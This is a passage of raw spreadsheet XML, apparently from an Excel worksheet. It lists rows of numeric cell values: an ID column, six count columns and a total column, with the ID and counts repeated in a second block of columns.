        <v>41</v>
      </c>
      <c r="K159" s="7">
        <v>456</v>
      </c>
      <c r="L159" s="8">
        <v>26</v>
      </c>
      <c r="M159" s="8">
        <v>1</v>
      </c>
      <c r="N159" s="8">
        <v>0</v>
      </c>
      <c r="O159" s="8">
        <v>0</v>
      </c>
      <c r="P159" s="8">
        <v>11</v>
      </c>
      <c r="Q159" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="160" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A160" s="7">
        <v>458</v>
      </c>
      <c r="B160" s="8">
        <v>15</v>
      </c>
      <c r="C160" s="8">
        <v>1</v>
      </c>
      <c r="D160" s="8">
        <v>3</v>
      </c>
      <c r="E160" s="8">
        <v>15</v>
      </c>
      <c r="F160" s="8">
        <v>10</v>
      </c>
      <c r="G160" s="8">
        <v>3</v>
      </c>
      <c r="H160" s="8">
        <v>47</v>
      </c>
      <c r="K160" s="7">
        <v>458</v>
      </c>
      <c r="L160" s="8">
        <v>15</v>
      </c>
      <c r="M160" s="8">
        <v>1</v>
      </c>
      <c r="N160" s="8">
        <v>3</v>
      </c>
      <c r="O160" s="8">
        <v>15</v>
      </c>
      <c r="P160" s="8">
        <v>10</v>
      </c>
      <c r="Q160" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="161" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A161" s="7">
        <v>459</v>
      </c>
      <c r="B161" s="8">
        <v>26</v>
      </c>
      <c r="C161" s="8">
        <v>2</v>
      </c>
      <c r="D161" s="8">
        <v>139</v>
      </c>
      <c r="E161" s="8">
        <v>131</v>
      </c>
      <c r="F161" s="8">
        <v>9</v>
      </c>
      <c r="G161" s="8">
        <v>8</v>
      </c>
      <c r="H161" s="8">
        <v>315</v>
      </c>
      <c r="K161" s="7">
        <v>459</v>
      </c>
      <c r="L161" s="8">
        <v>26</v>
      </c>
      <c r="M161" s="8">
        <v>2</v>
      </c>
      <c r="N161" s="8">
        <v>139</v>
      </c>
      <c r="O161" s="8">
        <v>131</v>
      </c>
      <c r="P161" s="8">
        <v>9</v>
      </c>
      <c r="Q161" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="162" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A162" s="7">
        <v>460</v>
      </c>
      <c r="B162" s="8">
        <v>31</v>
      </c>
      <c r="C162" s="8">
        <v>1</v>
      </c>
      <c r="D162" s="8">
        <v>45</v>
      </c>
      <c r="E162" s="8">
        <v>15</v>
      </c>
      <c r="F162" s="8">
        <v>4</v>
      </c>
      <c r="G162" s="8">
        <v>6</v>
      </c>
      <c r="H162" s="8">
        <v>102</v>
      </c>
      <c r="K162" s="7">
        <v>460</v>
      </c>
      <c r="L162" s="8">
        <v>31</v>
      </c>
      <c r="M162" s="8">
        <v>1</v>
      </c>
      <c r="N162" s="8">
        <v>45</v>
      </c>
      <c r="O162" s="8">
        <v>15</v>
      </c>
      <c r="P162" s="8">
        <v>4</v>
      </c>
      <c r="Q162" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="163" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A163" s="7">
        <v>462</v>
      </c>
      <c r="B163" s="8">
        <v>26</v>
      </c>
      <c r="C163" s="8">
        <v>0</v>
      </c>
      <c r="D163" s="8">
        <v>16</v>
      </c>
      <c r="E163" s="8">
        <v>12</v>
      </c>
      <c r="F163" s="8">
        <v>3</v>
      </c>
      <c r="G163" s="8">
        <v>1</v>
      </c>
      <c r="H163" s="8">
        <v>58</v>
      </c>
      <c r="K163" s="7">
        <v>462</v>
      </c>
      <c r="L163" s="8">
        <v>26</v>
      </c>
      <c r="M163" s="8">
        <v>0</v>
      </c>
      <c r="N163" s="8">
        <v>16</v>
      </c>
      <c r="O163" s="8">
        <v>12</v>
      </c>
      <c r="P163" s="8">
        <v>3</v>
      </c>
      <c r="Q163" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="164" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A164" s="7">
        <v>463</v>
      </c>
      <c r="B164" s="8">
        <v>26</v>
      </c>
      <c r="C164" s="8">
        <v>1</v>
      </c>
      <c r="D164" s="8">
        <v>69</v>
      </c>
      <c r="E164" s="8">
        <v>403</v>
      </c>
      <c r="F164" s="8">
        <v>11</v>
      </c>
      <c r="G164" s="8">
        <v>17</v>
      </c>
      <c r="H164" s="8">
        <v>527</v>
      </c>
      <c r="K164" s="7">
        <v>463</v>
      </c>
      <c r="L164" s="8">
        <v>26</v>
      </c>
      <c r="M164" s="8">
        <v>1</v>
      </c>
      <c r="N164" s="8">
        <v>69</v>
      </c>
      <c r="O164" s="8">
        <v>403</v>
      </c>
      <c r="P164" s="8">
        <v>11</v>
      </c>
      <c r="Q164" s="8">
        <v>17</v>
      </c>
    </row>
    <row r="165" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A165" s="7">
        <v>465</v>
      </c>
      <c r="B165" s="8">
        <v>26</v>
      </c>
      <c r="C165" s="8">
        <v>1</v>
      </c>
      <c r="D165" s="8">
        <v>15</v>
      </c>
      <c r="E165" s="8">
        <v>110</v>
      </c>
      <c r="F165" s="8">
        <v>8</v>
      </c>
      <c r="G165" s="8">
        <v>17</v>
      </c>
      <c r="H165" s="8">
        <v>177</v>
      </c>
      <c r="K165" s="7">
        <v>465</v>
      </c>
      <c r="L165" s="8">
        <v>26</v>
      </c>
      <c r="M165" s="8">
        <v>1</v>
      </c>
      <c r="N165" s="8">
        <v>15</v>
      </c>
      <c r="O165" s="8">
        <v>110</v>
      </c>
      <c r="P165" s="8">
        <v>8</v>
      </c>
      <c r="Q165" s="8">
        <v>17</v>
      </c>
    </row>
    <row r="166" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A166" s="7">
        <v>466</v>
      </c>
      <c r="B166" s="8">
        <v>6</v>
      </c>
      <c r="C166" s="8">
        <v>1</v>
      </c>
      <c r="D166" s="8">
        <v>1</v>
      </c>
      <c r="E166" s="8">
        <v>5</v>
      </c>
      <c r="F166" s="8">
        <v>0</v>
      </c>
      <c r="G166" s="8">
        <v>0</v>
      </c>
      <c r="H166" s="8">
        <v>13</v>
      </c>
      <c r="K166" s="7">
        <v>466</v>
      </c>
      <c r="L166" s="8">
        <v>6</v>
      </c>
      <c r="M166" s="8">
        <v>1</v>
      </c>
      <c r="N166" s="8">
        <v>1</v>
      </c>
      <c r="O166" s="8">
        <v>5</v>
      </c>
      <c r="P166" s="8">
        <v>0</v>
      </c>
      <c r="Q166" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="167" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A167" s="7">
        <v>467</v>
      </c>
      <c r="B167" s="8">
        <v>24</v>
      </c>
      <c r="C167" s="8">
        <v>1</v>
      </c>
      <c r="D167" s="8">
        <v>2</v>
      </c>
      <c r="E167" s="8">
        <v>0</v>
      </c>
      <c r="F167" s="8">
        <v>10</v>
      </c>
      <c r="G167" s="8">
        <v>1</v>
      </c>
      <c r="H167" s="8">
        <v>38</v>
      </c>
      <c r="K167" s="7">
        <v>467</v>
      </c>
      <c r="L167" s="8">
        <v>24</v>
      </c>
      <c r="M167" s="8">
        <v>1</v>
      </c>
      <c r="N167" s="8">
        <v>2</v>
      </c>
      <c r="O167" s="8">
        <v>0</v>
      </c>
      <c r="P167" s="8">
        <v>10</v>
      </c>
      <c r="Q167" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="168" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A168" s="7">
        <v>468</v>
      </c>
      <c r="B168" s="8">
        <v>0</v>
      </c>
      <c r="C168" s="8">
        <v>0</v>
      </c>
      <c r="D168" s="8">
        <v>28</v>
      </c>
      <c r="E168" s="8">
        <v>286</v>
      </c>
      <c r="F168" s="8">
        <v>33</v>
      </c>
      <c r="G168" s="8">
        <v>1</v>
      </c>
      <c r="H168" s="8">
        <v>348</v>
      </c>
      <c r="K168" s="7">
        <v>468</v>
      </c>
      <c r="L168" s="8">
        <v>0</v>
      </c>
      <c r="M168" s="8">
        <v>0</v>
      </c>
      <c r="N168" s="8">
        <v>28</v>
      </c>
      <c r="O168" s="8">
        <v>286</v>
      </c>
      <c r="P168" s="8">
        <v>33</v>
      </c>
      <c r="Q168" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="169" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A169" s="7">
        <v>469</v>
      </c>
      <c r="B169" s="8">
        <v>26</v>
      </c>
      <c r="C169" s="8">
        <v>0</v>
      </c>
      <c r="D169" s="8">
        <v>22</v>
      </c>
      <c r="E169" s="8">
        <v>25</v>
      </c>
      <c r="F169" s="8">
        <v>27</v>
      </c>
      <c r="G169" s="8">
        <v>21</v>
      </c>
      <c r="H169" s="8">
        <v>121</v>
      </c>
      <c r="K169" s="7">
        <v>469</v>
      </c>
      <c r="L169" s="8">
        <v>26</v>
      </c>
      <c r="M169" s="8">
        <v>0</v>
      </c>
      <c r="N169" s="8">
        <v>22</v>
      </c>
      <c r="O169" s="8">
        <v>25</v>
      </c>
      <c r="P169" s="8">
        <v>27</v>
      </c>
      <c r="Q169" s="8">
        <v>21</v>
      </c>
    </row>
    <row r="170" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A170" s="7">
        <v>473</v>
      </c>
      <c r="B170" s="8">
        <v>7</v>
      </c>
      <c r="C170" s="8">
        <v>0</v>
      </c>
      <c r="D170" s="8">
        <v>0</v>
      </c>
      <c r="E170" s="8">
        <v>0</v>
      </c>
      <c r="F170" s="8">
        <v>8</v>
      </c>
      <c r="G170" s="8">
        <v>2</v>
      </c>
      <c r="H170" s="8">
        <v>17</v>
      </c>
      <c r="K170" s="7">
        <v>473</v>
      </c>
      <c r="L170" s="8">
        <v>7</v>
      </c>
      <c r="M170" s="8">
        <v>0</v>
      </c>
      <c r="N170" s="8">
        <v>0</v>
      </c>
      <c r="O170" s="8">
        <v>0</v>
      </c>
      <c r="P170" s="8">
        <v>8</v>
      </c>
      <c r="Q170" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="171" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A171" s="7">
        <v>474</v>
      </c>
      <c r="B171" s="8">
        <v>7</v>
      </c>
      <c r="C171" s="8">
        <v>1</v>
      </c>
      <c r="D171" s="8">
        <v>4</v>
      </c>
      <c r="E171" s="8">
        <v>25</v>
      </c>
      <c r="F171" s="8">
        <v>3</v>
      </c>
      <c r="G171" s="8">
        <v>3</v>
      </c>
      <c r="H171" s="8">
        <v>43</v>
      </c>
      <c r="K171" s="7">
        <v>474</v>
      </c>
      <c r="L171" s="8">
        <v>7</v>
      </c>
      <c r="M171" s="8">
        <v>1</v>
      </c>
      <c r="N171" s="8">
        <v>4</v>
      </c>
      <c r="O171" s="8">
        <v>25</v>
      </c>
      <c r="P171" s="8">
        <v>3</v>
      </c>
      <c r="Q171" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="172" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A172" s="7">
        <v>475</v>
      </c>
      <c r="B172" s="8">
        <v>6</v>
      </c>
      <c r="C172" s="8">
        <v>1</v>
      </c>
      <c r="D172" s="8">
        <v>55</v>
      </c>
      <c r="E172" s="8">
        <v>91</v>
      </c>
      <c r="F172" s="8">
        <v>37</v>
      </c>
      <c r="G172" s="8">
        <v>17</v>
      </c>
      <c r="H172" s="8">
        <v>207</v>
      </c>
      <c r="K172" s="7">
        <v>475</v>
      </c>
      <c r="L172" s="8">
        <v>6</v>
      </c>
      <c r="M172" s="8">
        <v>1</v>
      </c>
      <c r="N172" s="8">
        <v>55</v>
      </c>
      <c r="O172" s="8">
        <v>91</v>
      </c>
      <c r="P172" s="8">
        <v>37</v>
      </c>
      <c r="Q172" s="8">
        <v>17</v>
      </c>
    </row>
    <row r="173" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A173" s="7">
        <v>479</v>
      </c>
      <c r="B173" s="8">
        <v>26</v>
      </c>
      <c r="C173" s="8">
        <v>0</v>
      </c>
      <c r="D173" s="8">
        <v>15</v>
      </c>
      <c r="E173" s="8">
        <v>15</v>
      </c>
      <c r="F173" s="8">
        <v>8</v>
      </c>
      <c r="G173" s="8">
        <v>4</v>
      </c>
      <c r="H173" s="8">
        <v>68</v>
      </c>
      <c r="K173" s="7">
        <v>479</v>
      </c>
      <c r="L173" s="8">
        <v>26</v>
      </c>
      <c r="M173" s="8">
        <v>0</v>
      </c>
      <c r="N173" s="8">
        <v>15</v>
      </c>
      <c r="O173" s="8">
        <v>15</v>
      </c>
      <c r="P173" s="8">
        <v>8</v>
      </c>
      <c r="Q173" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="174" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A174" s="7">
        <v>480</v>
      </c>
      <c r="B174" s="8">
        <v>24</v>
      </c>
      <c r="C174" s="8">
        <v>1</v>
      </c>
      <c r="D174" s="8">
        <v>20</v>
      </c>
      <c r="E174" s="8">
        <v>24</v>
      </c>
      <c r="F174" s="8">
        <v>5</v>
      </c>
      <c r="G174" s="8">
        <v>7</v>
      </c>
      <c r="H174" s="8">
        <v>81</v>
      </c>
      <c r="K174" s="7">
        <v>480</v>
      </c>
      <c r="L174" s="8">
        <v>24</v>
      </c>
      <c r="M174" s="8">
        <v>1</v>
      </c>
      <c r="N174" s="8">
        <v>20</v>
      </c>
      <c r="O174" s="8">
        <v>24</v>
      </c>
      <c r="P174" s="8">
        <v>5</v>
      </c>
      <c r="Q174" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="175" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A175" s="7">
        <v>482</v>
      </c>
      <c r="B175" s="8">
        <v>350</v>
      </c>
      <c r="C175" s="8">
        <v>1</v>
      </c>
      <c r="D175" s="8">
        <v>0</v>
      </c>
      <c r="E175" s="8">
        <v>25</v>
      </c>
      <c r="F175" s="8">
        <v>14</v>
      </c>
      <c r="G175" s="8">
        <v>10</v>
      </c>
      <c r="H175" s="8">
        <v>400</v>
      </c>
      <c r="K175" s="7">
        <v>482</v>
      </c>
      <c r="L175" s="8">
        <v>350</v>
      </c>
      <c r="M175" s="8">
        <v>1</v>
      </c>
      <c r="N175" s="8">
        <v>0</v>
      </c>
      <c r="O175" s="8">
        <v>25</v>
      </c>
      <c r="P175" s="8">
        <v>14</v>
      </c>
      <c r="Q175" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="176" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A176" s="7">
        <v>485</v>
      </c>
      <c r="B176" s="8">
        <v>6</v>
      </c>
      <c r="C176" s="8">
        <v>0</v>
      </c>
      <c r="D176" s="8">
        <v>0</v>
      </c>
      <c r="E176" s="8">
        <v>0</v>
      </c>
      <c r="F176" s="8">
        <v>11</v>
      </c>
      <c r="G176" s="8">
        <v>1</v>
      </c>
      <c r="H176" s="8">
        <v>18</v>
      </c>
      <c r="K176" s="7">
        <v>485</v>
      </c>
      <c r="L176" s="8">
        <v>6</v>
      </c>
      <c r="M176" s="8">
        <v>0</v>
      </c>
      <c r="N176" s="8">
        <v>0</v>
      </c>
      <c r="O176" s="8">
        <v>0</v>
      </c>
      <c r="P176" s="8">
        <v>11</v>
      </c>
      <c r="Q176" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="177" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A177" s="7">
        <v>486</v>
      </c>
      <c r="B177" s="8">
        <v>0</v>
      </c>
      <c r="C177" s="8">
        <v>0</v>
      </c>
      <c r="D177" s="8">
        <v>111</v>
      </c>
      <c r="E177" s="8">
        <v>246</v>
      </c>
      <c r="F177" s="8">
        <v>10</v>
      </c>
      <c r="G177" s="8">
        <v>24</v>
      </c>
      <c r="H177" s="8">
        <v>391</v>
      </c>
      <c r="K177" s="7">
        <v>486</v>
      </c>
      <c r="L177" s="8">
        <v>0</v>
      </c>
      <c r="M177" s="8">
        <v>0</v>
      </c>
      <c r="N177" s="8">
        <v>111</v>
      </c>
      <c r="O177" s="8">
        <v>246</v>
      </c>
      <c r="P177" s="8">
        <v>10</v>
      </c>
      <c r="Q177" s="8">
        <v>24</v>
      </c>
    </row>
    <row r="178" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A178" s="7">
        <v>489</v>
      </c>
      <c r="B178" s="8">
        <v>62</v>
      </c>
      <c r="C178" s="8">
        <v>1</v>
      </c>
      <c r="D178" s="8">
        <v>14</v>
      </c>
      <c r="E178" s="8">
        <v>7</v>
      </c>
      <c r="F178" s="8">
        <v>11</v>
      </c>
      <c r="G178" s="8">
        <v>4</v>
      </c>
      <c r="H178" s="8">
        <v>99</v>
      </c>
      <c r="K178" s="7">
        <v>489</v>
      </c>
      <c r="L178" s="8">
        <v>62</v>
      </c>
      <c r="M178" s="8">
        <v>1</v>
      </c>
      <c r="N178" s="8">
        <v>14</v>
      </c>
      <c r="O178" s="8">
        <v>7</v>
      </c>
      <c r="P178" s="8">
        <v>11</v>
      </c>
      <c r="Q178" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="179" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A179" s="7">
        <v>491</v>
      </c>
      <c r="B179" s="8">
        <v>25</v>
      </c>
      <c r="C179" s="8">
        <v>1</v>
      </c>
      <c r="D179" s="8">
        <v>89</v>
      </c>
      <c r="E179" s="8">
        <v>744</v>
      </c>
      <c r="F179" s="8">
        <v>7</v>
      </c>
      <c r="G179" s="8">
        <v>8</v>
      </c>
      <c r="H179" s="8">
        <v>874</v>
      </c>
      <c r="K179" s="7">
        <v>491</v>
      </c>
      <c r="L179" s="8">
        <v>25</v>
      </c>
      <c r="M179" s="8">
        <v>1</v>
      </c>
      <c r="N179" s="8">
        <v>89</v>
      </c>
      <c r="O179" s="8">
        <v>744</v>
      </c>
      <c r="P179" s="8">
        <v>7</v>
      </c>
      <c r="Q179" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="180" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A180" s="7">
        <v>492</v>
      </c>
      <c r="B180" s="8">
        <v>26</v>
      </c>
      <c r="C180" s="8">
        <v>1</v>
      </c>
      <c r="D180" s="8">
        <v>2</v>
      </c>
      <c r="E180" s="8">
        <v>20</v>
      </c>
      <c r="F180" s="8">
        <v>1</v>
      </c>
      <c r="G180" s="8">
        <v>20</v>
      </c>
      <c r="H180" s="8">
        <v>70</v>
      </c>
      <c r="K180" s="7">
        <v>492</v>
      </c>
      <c r="L180" s="8">
        <v>26</v>
      </c>
      <c r="M180" s="8">
        <v>1</v>
      </c>
      <c r="N180" s="8">
        <v>2</v>
      </c>
      <c r="O180" s="8">
        <v>20</v>
      </c>
      <c r="P180" s="8">
        <v>1</v>
      </c>
      <c r="Q180" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="181" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A181" s="7">
        <v>495</v>
      </c>
      <c r="B181" s="8">
        <v>24</v>
      </c>
      <c r="C181" s="8">
        <v>1</v>
      </c>
      <c r="D181" s="8">
        <v>29</v>
      </c>
      <c r="E181" s="8">
        <v>70</v>
      </c>
      <c r="F181" s="8">
        <v>14</v>
      </c>
      <c r="G181" s="8">
        <v>15</v>
      </c>
      <c r="H181" s="8">
        <v>153</v>
      </c>
      <c r="K181" s="7">
        <v>495</v>
      </c>
      <c r="L181" s="8">
        <v>24</v>
      </c>
      <c r="M181" s="8">
        <v>1</v>
      </c>
      <c r="N181" s="8">
        <v>29</v>
      </c>
      <c r="O181" s="8">
        <v>70</v>
      </c>
      <c r="P181" s="8">
        <v>14</v>
      </c>
      <c r="Q181" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="182" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A182" s="7">
        <v>500</v>
      </c>
      <c r="B182" s="8">
        <v>26</v>
      </c>
      <c r="C182" s="8">
        <v>0</v>
      </c>
      <c r="D182" s="8">
        <v>0</v>
      </c>
      <c r="E182" s="8">
        <v>0</v>
      </c>
      <c r="F182" s="8">
        <v>13</v>
      </c>
      <c r="G182" s="8">
        <v>0</v>
      </c>
      <c r="H182" s="8">
        <v>39</v>
      </c>
      <c r="K182" s="7">
        <v>500</v>
      </c>
      <c r="L182" s="8">
        <v>26</v>
      </c>
      <c r="M182" s="8">
        <v>0</v>
      </c>
      <c r="N182" s="8">
        <v>0</v>
      </c>
      <c r="O182" s="8">
        <v>0</v>
      </c>
      <c r="P182" s="8">
        <v>13</v>
      </c>
      <c r="Q182" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="183" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A183" s="7">
        <v>501</v>
      </c>
      <c r="B183" s="8">
        <v>6</v>
      </c>
      <c r="C183" s="8">
        <v>1</v>
      </c>
      <c r="D183" s="8">
        <v>0</v>
      </c>
      <c r="E183" s="8">
        <v>0</v>
      </c>
      <c r="F183" s="8">
        <v>1</v>
      </c>
      <c r="G183" s="8">
        <v>5</v>
      </c>
      <c r="H183" s="8">
        <v>13</v>
      </c>
      <c r="K183" s="7">
        <v>501</v>
      </c>
      <c r="L183" s="8">
        <v>6</v>
      </c>
      <c r="M183" s="8">
        <v>1</v>
      </c>
      <c r="N183" s="8">
        <v>0</v>
      </c>
      <c r="O183" s="8">
        <v>0</v>
      </c>
      <c r="P183" s="8">
        <v>1</v>
      </c>
      <c r="Q183" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="184" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A184" s="7">
        <v>502</v>
      </c>
      <c r="B184" s="8">
        <v>6</v>
      </c>
      <c r="C184" s="8">
        <v>1</v>
      </c>
      <c r="D184" s="8">
        <v>0</v>
      </c>
      <c r="E184" s="8">
        <v>0</v>
      </c>
      <c r="F184" s="8">
        <v>0</v>
      </c>
      <c r="G184" s="8">
        <v>6</v>
      </c>
      <c r="H184" s="8">
        <v>13</v>
      </c>
      <c r="K184" s="7">
        <v>502</v>
      </c>
      <c r="L184" s="8">
        <v>6</v>
      </c>
      <c r="M184" s="8">
        <v>1</v>
      </c>
      <c r="N184" s="8">
        <v>0</v>
      </c>
      <c r="O184" s="8">
        <v>0</v>
      </c>
      <c r="P184" s="8">
        <v>0</v>
      </c>
      <c r="Q184" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="185" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A185" s="7">
        <v>505</v>
      </c>
      <c r="B185" s="8">
        <v>0</v>
      </c>
      <c r="C185" s="8">
        <v>0</v>
      </c>
      <c r="D185" s="8">
        <v>11</v>
      </c>
      <c r="E185" s="8">
        <v>16</v>
      </c>
      <c r="F185" s="8">
        <v>3</v>
      </c>
      <c r="G185" s="8">
        <v>0</v>
      </c>
      <c r="H185" s="8">
        <v>30</v>
      </c>
      <c r="K185" s="7">
        <v>505</v>
      </c>
      <c r="L185" s="8">
        <v>0</v>
      </c>
      <c r="M185" s="8">
        <v>0</v>
      </c>
      <c r="N185" s="8">
        <v>11</v>
      </c>
      <c r="O185" s="8">
        <v>16</v>
      </c>
      <c r="P185" s="8">
        <v>3</v>
      </c>
      <c r="Q185" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="186" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A186" s="7">
        <v>506</v>
      </c>
      <c r="B186" s="8">
        <v>25</v>
      </c>
      <c r="C186" s="8">
        <v>3</v>
      </c>
      <c r="D186" s="8">
        <v>5</v>
      </c>
      <c r="E186" s="8">
        <v>5</v>
      </c>
      <c r="F186" s="8">
        <v>70</v>
      </c>
      <c r="G186" s="8">
        <v>85</v>
      </c>
      <c r="H186" s="8">
        <v>193</v>
      </c>
      <c r="K186" s="7">
        <v>506</v>
      </c>
      <c r="L186" s="8">
        <v>25</v>
      </c>
      <c r="M186" s="8">
        <v>3</v>
      </c>
      <c r="N186" s="8">
        <v>5</v>
      </c>
      <c r="O186" s="8">
        <v>5</v>
      </c>
      <c r="P186" s="8">
        <v>70</v>
      </c>
      <c r="Q186" s="8">
        <v>85</v>
      </c>
    </row>
    <row r="187" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A187" s="7">
        <v>507</v>
      </c>
      <c r="B187" s="8">
        <v>25</v>
      </c>
      <c r="C187" s="8">
        <v>1</v>
      </c>
      <c r="D187" s="8">
        <v>59</v>
      </c>
      <c r="E187" s="8">
        <v>65</v>
      </c>
      <c r="F187" s="8">
        <v>85</v>
      </c>
      <c r="G187" s="8">
        <v>204</v>
      </c>
      <c r="H187" s="8">
        <v>439</v>
      </c>
      <c r="K187" s="7">
        <v>507</v>
      </c>
      <c r="L187" s="8">
        <v>25</v>
      </c>
      <c r="M187" s="8">
        <v>1</v>
      </c>
      <c r="N187" s="8">
        <v>59</v>
      </c>
      <c r="O187" s="8">
        <v>65</v>
      </c>
      <c r="P187" s="8">
        <v>85</v>
      </c>
      <c r="Q187" s="8">
        <v>204</v>
      </c>
    </row>
    <row r="188" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A188" s="7">
        <v>509</v>
      </c>
      <c r="B188" s="8">
        <v>25</v>
      </c>
      <c r="C188" s="8">
        <v>1</v>
      </c>
      <c r="D188" s="8">
        <v>10</v>
      </c>
      <c r="E188" s="8">
        <v>10</v>
      </c>
      <c r="F188" s="8">
        <v>14</v>
      </c>
      <c r="G188" s="8">
        <v>33</v>
      </c>
      <c r="H188" s="8">
        <v>93</v>
      </c>
      <c r="K188" s="7">
        <v>509</v>
      </c>
      <c r="L188" s="8">
        <v>25</v>
      </c>
      <c r="M188" s="8">
        <v>1</v>
      </c>
      <c r="N188" s="8">
        <v>10</v>
      </c>
      <c r="O188" s="8">
        <v>10</v>
      </c>
      <c r="P188" s="8">
        <v>14</v>
      </c>
      <c r="Q188" s="8">
        <v>33</v>
      </c>
    </row>
    <row r="189" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A189" s="7">
        <v>510</v>
      </c>
      <c r="B189" s="8">
        <v>20</v>
      </c>
      <c r="C189" s="8">
        <v>0</v>
      </c>
      <c r="D189" s="8">
        <v>20</v>
      </c>
      <c r="E189" s="8">
        <v>12</v>
      </c>
      <c r="F189" s="8">
        <v>6</v>
      </c>
      <c r="G189" s="8">
        <v>5</v>
      </c>
      <c r="H189" s="8">
        <v>63</v>
      </c>
      <c r="K189" s="7">
        <v>510</v>
      </c>
      <c r="L189" s="8">
        <v>20</v>
      </c>
      <c r="M189" s="8">
        <v>0</v>
      </c>
      <c r="N189" s="8">
        <v>20</v>
      </c>
      <c r="O189" s="8">
        <v>12</v>
      </c>
      <c r="P189" s="8">
        <v>6</v>
      </c>
      <c r="Q189" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="190" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A190" s="7">
        <v>511</v>
      </c>
      <c r="B190" s="8">
        <v>26</v>
      </c>
      <c r="C190" s="8">
        <v>1</v>
      </c>
      <c r="D190" s="8">
        <v>4</v>
      </c>
      <c r="E190" s="8">
        <v>0</v>
      </c>
      <c r="F190" s="8">
        <v>12</v>
      </c>
      <c r="G190" s="8">
        <v>2</v>
      </c>
      <c r="H190" s="8">
        <v>45</v>
      </c>
      <c r="K190" s="7">
        <v>511</v>
      </c>
      <c r="L190" s="8">
        <v>26</v>
      </c>
      <c r="M190" s="8">
        <v>1</v>
      </c>
      <c r="N190" s="8">
        <v>4</v>
      </c>
      <c r="O190" s="8">
        <v>0</v>
      </c>
      <c r="P190" s="8">
        <v>12</v>
      </c>
      <c r="Q190" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="191" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A191" s="7">
        <v>512</v>
      </c>
      <c r="B191" s="8">
        <v>26</v>
      </c>
      <c r="C191" s="8">
        <v>0</v>
      </c>
      <c r="D191" s="8">
        <v>3</v>
      </c>
      <c r="E191" s="8">
        <v>3</v>
      </c>
      <c r="F191" s="8">
        <v>8</v>
      </c>
      <c r="G191" s="8">
        <v>9</v>
      </c>
      <c r="H191" s="8">
        <v>49</v>
      </c>
      <c r="K191" s="7">
        <v>512</v>
      </c>
      <c r="L191" s="8">
        <v>26</v>
      </c>
      <c r="M191" s="8">
        <v>0</v>
      </c>
      <c r="N191" s="8">
        <v>3</v>
      </c>
      <c r="O191" s="8">
        <v>3</v>
      </c>
      <c r="P191" s="8">
        <v>8</v>
      </c>
      <c r="Q191" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="192" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A192" s="7">
        <v>514</v>
      </c>
      <c r="B192" s="8">
        <v>1</v>
      </c>
      <c r="C192" s="8">
        <v>25</v>
      </c>
      <c r="D192" s="8">
        <v>15</v>
      </c>
      <c r="E192" s="8">
        <v>20</v>
      </c>
      <c r="F192" s="8">
        <v>20</v>
      </c>
      <c r="G192" s="8">
        <v>15</v>
      </c>
      <c r="H192" s="8">
        <v>96</v>
      </c>
      <c r="K192" s="7">
        <v>514</v>
      </c>
      <c r="L192" s="8">
        <v>1</v>
      </c>
      <c r="M192" s="8">
        <v>25</v>
      </c>
      <c r="N192" s="8">
        <v>15</v>
      </c>
      <c r="O192" s="8">
        <v>20</v>
      </c>
      <c r="P192" s="8">
        <v>20</v>
      </c>
      <c r="Q192" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="193" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A193" s="7">
        <v>515</v>
      </c>
      <c r="B193" s="8">
        <v>0</v>
      </c>
      <c r="C193" s="8">
        <v>0</v>
      </c>
      <c r="D193" s="8">
        <v>5</v>
      </c>
      <c r="E193" s="8">
        <v>92</v>
      </c>
      <c r="F193" s="8">
        <v>1</v>
      </c>
      <c r="G193" s="8">
        <v>0</v>
      </c>
      <c r="H193" s="8">
